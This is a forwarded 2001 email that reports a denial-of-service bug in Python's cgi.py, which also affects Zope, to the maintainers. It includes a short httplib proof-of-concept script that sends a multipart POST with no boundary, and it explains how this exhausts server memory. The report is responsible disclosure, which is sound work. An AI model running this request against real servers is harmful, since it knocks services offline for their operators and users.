I got this in the mail:
"""
Subject: Bug in cgi.py, denial-of-service possible
From: Richard Jones <richard@bizarsoftware.com.au>
To: guido@python.org, support@digicool.com
Date: Fri, 20 Jul 2001 17:43:15 +1000
The inner workings of cgi.py are still a mystery to me,
so I can't offer a
patch. Sorry.
The following code will effect a denial-of-service
against any server running
cgi.py (and hence Zope).
import httplib
params = '\n'*10
h = httplib.HTTP('localhost', 8080)
h.putrequest('POST', '/')
h.putheader('Content-type', 'multipart/form-data')
h.putheader('Content-length', str(len(params)))
h.endheaders()
h.send(params)
The key here is the missing boundary from the
content-type header. From my
observation, it seems that cgi.py defaults the boundary
to "" which means
that it matches boundaries without progressing through
the input - creating
new FieldStorage instances for each match. The result
is all available RAM
gobbled up eventually. I recommend testing this on a
system on which you can
easily kill the server process.
Richard
--
Richard Jones
richard@bizarsoftware.com.au
Senior Software Developer, Bizar Software
(www.bizarsoftware.com.au)
"""
|